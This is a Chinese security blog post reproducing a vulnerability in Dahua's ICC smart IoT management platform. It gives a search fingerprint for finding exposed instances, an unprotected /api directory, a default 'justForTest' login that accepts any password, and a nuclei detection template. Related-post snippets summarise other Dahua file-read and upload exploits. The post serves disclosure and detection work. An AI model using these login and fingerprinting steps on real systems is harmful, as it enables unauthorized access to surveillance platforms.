【漏洞复现】某大厂存在信息泄露与逻辑漏洞

最新推荐文章于 2024-03-10 17:41:39 发布
最新推荐文章于 2024-03-10 17:41:39 发布
阅读量936 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: web安全 安全 网络 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/134136285
版权

0x01 漏洞介绍
浙江大华技术股份有限公司智能物联综合管理平台是一款基于物联网技术的综合性管理平台,旨在为企业和用户提供智能化、便捷化的物联网解决方案。该平台整合了大华技术在视频监控、数据采集、数据分析等方面的核心技术,实现了对各类物联网设备的统一管理和控制,提高了企业的运营效率和管理水平。该漏洞因为对敏感目录没有做访问限制,以及没有删除默认用户。
0x02 影响版本

浙江大华技术股份有限公司智能物联综合管理平台(ICC)

0x03 语法特征

icon_hash="-1935899595"

0x04 漏洞复现
页面
 


POC

url+/api


默认用户即可登录后台(密码随意)
justForTest/xxxxx
 


nuclei:

id: ICC-API-INFO-WEAK
info:
  name: ICC-API-INFO-WEAK
  author: ICC-API-INFO-WEAK
  severity: medium
  tags: icon_hash="-1935899595"

http:
  - raw:
    - |
        GET /api/ HTTP/2
        Host: {{Hostname}}
        Cookie: name=value

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "文档目录"
      - type: status
        status:
          - 200

 

免费领取安全学习资料包!(私聊进群一起学习,共同进步)

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

黑客大佬
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
安网AC智能路由系统actpt_5g.data敏感信息泄露漏洞复现 [附POC]
薛定谔嘚喵博客
11-29 434
安网智能AC管理系统actpt_5g.data存在信息漏洞,攻击者可利用该漏洞获取敏感信息。攻击者可利用该漏洞获取AC智能路由系统WEB登录账号密码,登录AC智能路由系统获取WEB管理员权限,从而造成敏感信息泄露
大华智能物联综合管理平台justForTest用户登录漏洞(含批量验证poc)
weixin_43567873的博客
04-22 564
大华智能物联综合管理平台justForTest用户登录漏洞(含批量验证poc)
漏洞复现--大华ICC readpic任意文件读取漏洞
qq_53003652的博客
11-03 1149
对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。ICC,即大华浩睿智能物联综合管理平台。该产品readpic存在任意文件读取漏洞大华ICC智能物联综合管理平台
大华城市安防监控系统平台管理存在任意文件下载漏洞
剁椒鱼头没剁椒的博客
02-14 2837
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。刷新登录页面进行抓包,然后在数据包中添加POC。大华城市安防监控系统平台管理
Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134)风险通告及POC复现
qq_18209847的博客
06-07 2942
信息安全部监测到Atlassian Confluence Server and Data Center (CVE-2022-26134)远程代码执行漏洞
大华城市安防系统平台任意文件下载漏洞
CommputerMac的博客
10-06 638
大华城市安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。该平台支持多种接入方式,包括网络视频、模拟视频、数字视频、IP电话、对讲机等。此外,该平台还支持多种报警方式,包括移动侦测、区域入侵、越线报警、人员聚集等。filePath=file:///etc/passwd,可下载文件。大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。关注微信公众号 网络安全透视镜 回复 20231007 获取检测利用脚本。
上海某大厂java面试真题与解析
最新发布
05-07
1、"上海某大厂面试真题,掌握并发编程三大核心—原子性、可见性和有序性,是优化高并发系统性能的关键所在。#Java并发编程 #电商技术挑战" 2、“了解多线程创建的四种方式,包括Runnable、Callable以及线程池的...
大厂c语言笔试面试题.pdf
03-18
某个大厂C语言面试题,非常宝贵,供各位新手学习。
某知名大厂Java工程师面试总结
03-09
涵盖Java、MyBatis、ZooKeeper、Dubbo、Elasticsearch、Memcached、 Redis、MySQL、Spring、Spring Boot、Spring Cloud、RabbitMQ、Kafka、 Linux
尚硅谷 大厂学院 大厂学院算法与数据结构解析.zip
01-14
逻辑结构:描述数据元素之间的逻辑关系,如线性结构(如数组、链表)、树形结构(如二叉树、堆、B树)、图结构(有向图、无向图等)以及集合和队列等抽象数据类型。 存储结构(物理结构):描述数据在计算机中如何...
大厂应急响应事件标准处理流程
01-30
大厂应急响应事件标准处理流程 本文档旨在介绍某大厂应急响应事件标准处理流程,涵盖了 WEB安全事件和系统恶意程序事件的处理过程。下面将详细介绍每个阶段的处理流程和相关知识点。 事件确认阶段: 在事件...
大华DSS S2-045 OGNL表达式注入漏洞复现
0xSec
12-08 1025
大华DSS安防监控系统平台采用ApacheStruts2作为网站应用框架。由于应用程序框架存在远程命令执行漏洞,攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞,然后执行该漏洞。系统命令以获取服务器权限。
漏洞复现大华ICC智能物联综合管理平台任意文件读取漏洞
晚风不及你
03-10 817
大华智能物联综合管理平台 iConnection Center(以下简称:ICC平台),是一套基于智能物联综合业务管理平台软件,具备强大的后台服务能力,配套了B/S管理员端、C/S客户端、移动APP终端、小程序等不同应用端,满足用户各种使用需求。
漏洞复现大华智能物联ICC综合管理平台弱口令漏洞
晚风不及你
02-23 883
大华智能物联ICC综合管理平台是一个集成了多种智能物联应用服务能力的平台。该平台提供了一系列的基础能力,如中台基础能力、各智能物联应用服务能力以及周边生态支持。
漏洞复现大华智能物联ICC综合管理平台文件读取漏洞
晚风不及你
02-23 1195
大华智能物联ICC综合管理平台是一个集成了多种智能物联应用服务能力的平台。该平台提供了一系列的基础能力,如中台基础能力、各智能物联应用服务能力以及周边生态支持。
大华智慧园区综合管理平台 任意文件读取漏洞复现
10-10 930
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
漏洞复现大华智慧园区综合管理平台前台任意文件上传漏洞
做自己喜欢的事,并将其发挥到极致!
09-13 682
大华智慧园区综合管理平台是由大华技术股份有限公司(Dahua Technology)开发的一款综合管理解决方案。该平台旨在帮助园区管理者提高管理效率、提升安全水平、优化资源利用,并实现智能化的园区运营。大华智慧园区综合管理平台采用模块化设计和开放式架构,可根据不同园区的需求进行定制和扩展。同时,它还支持云端部署和移动端访问,方便管理者随时随地监控园区运营情况。大华智慧园区综合管理平台存在前台任意文件上传漏洞,攻击者可通过特定Payload获取服务器敏感信息,进而获取服务器控制权限。
漏洞复现大华智慧园区综合管理平台信息泄露漏洞
晚风不及你
02-21 1384
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华智慧园区综合管理平台RCE漏洞
holyxp的博客
07-17 1950
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。​ 大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
计算机科学与技术专业学习路线?怎样才能毕业进大厂
07-23
计算机科学与技术专业是一个广泛且深入的领域,以下是一般的学习路线和一些建议,帮助您在这个领域取得成功并有机会进入大厂: 1. 基础知识学习:首先,建立坚实的计算机科学基础知识。学习数据结构、算法、操作系统、计算机网络等核心课程,理解计算机底层原理和工作机制。 2. 编程语言掌握:熟练掌握至少一门主流编程语言,如C++、Java、Python等。通过实践项目和解决实际问题,提升编程能力。 3. 实践项目经验:参与开源项目、个人项目或校内外实习等,积累实践经验。这有助于展示您的技能和对于解决问题的能力。 4. 深入专研:选择自己感兴趣的方向进行深入研究,如人工智能网络安全、大数据等。通过阅读论文、参加研讨会等方式,不断拓宽自己的知识面。 5. 实习与实践:尽可能多地参加实习,获得实际工作经验。通过实习,您可以学习到实际项目开发流程、团队协作等技能,同时增加与大厂接触的机会。 6. 提升软技能:除了技术能力,大厂也看重沟通、团队合作和领导能力。发展自己的软技能,如沟通技巧、解决问题的能力、项目管理等,能够提高自己在求职中的竞争力。 7. 多方面准备:大厂对于求职者有着较高的要求,包括技术面试、算法题、系统设计、逻辑思维等。除了技术准备外,多参加面试模拟、刷题等活动,提前准备面试所需的各项能力。 8. 学习资源利用:利用各种学习资源,如在线课程、教材、技术博客等。参与技术社区,与其他人交流学习经验和观点。 请注意,以上是一般的建议,不同的大厂对求职者的要求可能有所不同。因此,您可以根据目标公司的需求和招聘信息来调整自己的学习和准备方向。最重要的是保持学习的态度和对技术的热情,不断提升自己的能力和知识储备。祝您顺利毕业并实现进入大厂的目标!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值